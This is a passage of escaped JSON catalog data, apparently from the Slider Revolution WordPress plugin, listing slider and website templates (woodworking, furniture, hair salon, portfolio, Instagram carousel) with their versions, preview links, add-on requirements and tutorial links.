Isometric Slider\",\"alias\":\"furniture-store-isometric-slider\",\"zip\":\"furniture-store-isometric-slider.zip\",\"uid\":\"385f8e4dac9f84ea72388f656b200251\",\"img\":\"furniture-store-isometric-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/furniture-store-isometric-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=furniture-store-isometric-slider\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A furniture store slider template with stunning and versatile visuals! With bold and beautiful 3D isometric graphics, it\'s the perfect way to showcase modern furniture pieces and room designs.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-02-22 16:35:11\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"664\":{\"id\":\"709\",\"title\":\"Woodworking Website Template Package\",\"alias\":\"woodworking-website-template-package\",\"zip\":\"\",\"uid\":\"woodworking-website-template-package\",\"img\":\"packages\\/Woodworking-Website-Template.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-03-15 10:54:05\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"665\":{\"id\":\"710\",\"title\":\"Wood Art One Page Hero\",\"alias\":\"wood-art-one-page-hero\",\"zip\":\"packs\\/wood-art-one-page-hero.zip\",\"uid\":\"4236270d46058389ddb032f6c68d63dc\",\"img\":\"wood-art-one-page-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-03-15 11:15:10\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"666\":{\"id\":\"711\",\"title\":\"Wood Art One Page About\",\"alias\":\"wood-art-one-page-about\",\"zip\":\"packs\\/wood-art-one-page-about.zip\",\"uid\":\"c14fe92fa107d914dab4826681db8d1d\",\"img\":\"wood-art-one-page-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-03-15 11:19:12\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"667\":{\"id\":\"712\",\"title\":\"Wood Art One Page Work\",\"alias\":\"wood-art-one-page-work\",\"zip\":\"packs\\/wood-art-one-page-work.zip\",\"uid\":\"a5d98ff9e7ecc52e9c8f5cb69e13fab9\",\"img\":\"wood-art-one-page-work\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"slider\"],\"plugin_require\":null,\"date\":\"2023-03-15 11:23:03\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"668\":{\"id\":\"713\",\"title\":\"Wood Art One Page Testimonials\",\"alias\":\"wood-art-one-page-testimonials\",\"zip\":\"packs\\/wood-art-one-page-testimonials.zip\",\"uid\":\"10cc4a93223c739cdd72a6f29ddfdbdc\",\"img\":\"wood-art-one-page-testimonials\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-03-15 11:32:12\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"669\":{\"id\":\"714\",\"title\":\"Wood Art One Page Events\",\"alias\":\"wood-art-one-page-events\",\"zip\":\"packs\\/wood-art-one-page-events.zip\",\"uid\":\"caf1318cca92472611d1bff75de2834e\",\"img\":\"wood-art-one-page-events\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-03-15 11:35:58\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"670\":{\"id\":\"715\",\"title\":\"Wood Art One Page Footer\",\"alias\":\"wood-art-one-page-footer\",\"zip\":\"packs\\/wood-art-one-page-footer.zip\",\"uid\":\"096eb58a1bdc1da5f228ee26f44cc35e\",\"img\":\"wood-art-one-page-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-03-15 11:38:37\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"671\":{\"id\":\"716\",\"title\":\"Wood Art One Page Gallery 1\",\"alias\":\"wood-art-one-page-gallery1\",\"zip\":\"packs\\/wood-art-one-page-gallery1.zip\",\"uid\":\"9692c155e32743e6ad5656ff98fc1854\",\"img\":\"wood-art-one-page-gallery1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2023-03-15 11:43:14\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"672\":{\"id\":\"717\",\"title\":\"Wood Art One Page Gallery 2\",\"alias\":\"wood-art-one-page-gallery2\",\"zip\":\"packs\\/wood-art-one-page-gallery2.zip\",\"uid\":\"63487dd51eb68d1f748cbdc01d1659aa\",\"img\":\"wood-art-one-page-gallery2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2023-03-15 11:46:52\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"673\":{\"id\":\"718\",\"title\":\"Wood Art One Page Gallery 3\",\"alias\":\"wood-art-one-page-gallery3\",\"zip\":\"packs\\/wood-art-one-page-gallery3.zip\",\"uid\":\"4d907965c605272fdb037aadd150e533\",\"img\":\"wood-art-one-page-gallery3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2023-03-15 11:49:44\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"674\":{\"id\":\"719\",\"title\":\"Wood Art One Page Gallery 4\",\"alias\":\"wood-art-one-page-gallery4\",\"zip\":\"packs\\/wood-art-one-page-gallery4.zip\",\"uid\":\"1ea74ff7001db07847cb98f505f62569\",\"img\":\"wood-art-one-page-gallery4\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2023-03-15 11:53:19\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"675\":{\"id\":\"720\",\"title\":\"Wood Art One Page Gallery 5\",\"alias\":\"wood-art-one-page-gallery5\",\"zip\":\"packs\\/wood-art-one-page-gallery5.zip\",\"uid\":\"f7c9b11f559f69fb2fdff1ca96ff9c4d\",\"img\":\"wood-art-one-page-gallery5\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woodworking-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woodworking-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A beautifully crafted, user-friendly, and visually stunning template that is perfect for both professional woodworkers and woodworking enthusiasts alike. This template has been meticulously designed to showcase your skills, projects, and products in a captivating and engaging manner, allowing you to create an online presence that truly stands out from the competition.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2023-03-15 11:56:28\",\"package\":\"Woodworking Website Template Package\",\"package_order\":\"10\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a 3D Product Carousel for Your eCommerce Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-3d-product-carousel-for-your-ecommerce-site\\/\",\"guide_img\":\"tutorial\\/Woodworking-Website-Template.png\",\"active\":\"1\",\"package_id\":\"61\",\"installed\":false},\"676\":{\"id\":\"721\",\"title\":\"Hero Template With Cursor Animation\",\"alias\":\"Hero-Template-With-Cursor-Animation\",\"zip\":\"Hero-Template-With-Cursor-Animation.zip\",\"uid\":\"a0b666db728eb8585980a43443fb30bf\",\"img\":\"Hero-Template-With-Cursor-Animation\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/hero-template-with-cursor-animation\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=hero-template-with-cursor-animation\",\"version\":\"1.0.0\",\"required\":\"6.6.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Elevate your website with our hero template that features a captivating cursor animation. Perfect for any website design project.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-03-28 11:18:43\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Mesmerizing Effect for Your Hero Image [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-mesmerizing-effect-for-your-hero-image\\/\",\"guide_img\":\"tutorial\\/Hero-Template-With-Cursor-Animation.png\",\"active\":\"1\",\"installed\":false},\"677\":{\"id\":\"319\",\"title\":\"Modern Portfolio Website\",\"alias\":\"modern-portfolio-website\",\"zip\":\"\",\"uid\":\"modern-portfolio-website\",\"img\":\"packages\\/portfolio-package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/modern-portfolio-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-portfolio-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">A modern portfolio template with fancy scroll animations and a colorful design.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Modern Portfolio\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Add a Dramatic Pop of Color to Your Site with a Duotone Effect [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-add-a-dramatic-pop-of-color-to-your-site-with-a-duotone-effect\\/\",\"guide_img\":\"tutorial\\/Modern-Portfolio-Website.png\",\"active\":\"1\",\"package_id\":\"23\",\"installed\":false},\"678\":{\"id\":\"402\",\"title\":\"Brutal Website Template\",\"alias\":\"brutal-website-template\",\"zip\":\"\",\"uid\":\"brutal-website-template\",\"img\":\"packages\\/brutal-website-template.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/brutal-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=brutal-website-template\",\"version\":\"1.0.2\",\"required\":\"6.1.2\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Brutal template is a one-pager with a unique design that sticks out. The project & services sliders with direction based transitions are particularly interesting.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Brutal Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Scroll-Triggered About Me Section for the Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-scroll-triggered-about-me-section-for-the-home-page\\/\",\"guide_img\":\"tutorial\\/Brutal-Website.png\",\"active\":\"1\",\"package_id\":\"31\",\"installed\":false},\"679\":{\"id\":\"722\",\"title\":\"Modern Hair Salon Showcase\",\"alias\":\"futuristic-hairstyles-slider\",\"zip\":\"futuristic-hairstyles-slider.zip\",\"uid\":\"29d22b07310f9f2a9e504f565bca3864\",\"img\":\"futuristic-hairstyles-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-hair-salon-showcase\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-hair-salon-showcase\",\"version\":\"1.0.0\",\"required\":\"6.6.12\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Showcase your salon\'s unique services, talented stylists, and stunning transformations with high-quality images, videos, and testimonials. Engage your audience with interactive sliders, sleek animations, and an intuitive design that highlights your salon\'s expertise.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-04-17 11:43:56\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Creative Way to Display Different Options and Offerings on Your Site [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-display-different-options-and-offerings-on-your-site\\/\",\"guide_img\":\"tutorial\\/futuristic-hairstyles-slider.png\",\"active\":\"1\",\"installed\":false},\"680\":{\"id\":\"723\",\"title\":\"Instagram Gallery Carousel 1\",\"alias\":\"instagram-gallery-carousel-1\",\"zip\":\"instagram-gallery-carousel-1.zip\",\"uid\":\"28ab921107c8748e1f67185448e4488c\",\"img\":\"instagram-gallery-carousel-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/wordpress-image-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-image-carousel\",\"version\":\"1.0.0\",\"required\":\"6.6.12\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Effortlessly blend your website\'s visual content with your vibrant Instagram feed in a sleek, responsive carousel.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"socialmedia\"],\"plugin_require\":null,\"date\":\"2023-04-17 11:49:21\",\"package\":\"Instagram Gallery Carousel Pack\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Uniquely Display Your Instagram Feed on Your Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-uniquely-display-your-instagram-feed-on-your-website\\/\",\"guide_img\":\"tutorial\\/Instagram-Gallery-Carousel-Pack.png\",\"active\":\"1\",\"package_id\":\"62\",\"installed\":false},\"681\":{\"id\":\"724\",\"title\":\"Instagram Gallery Carousel 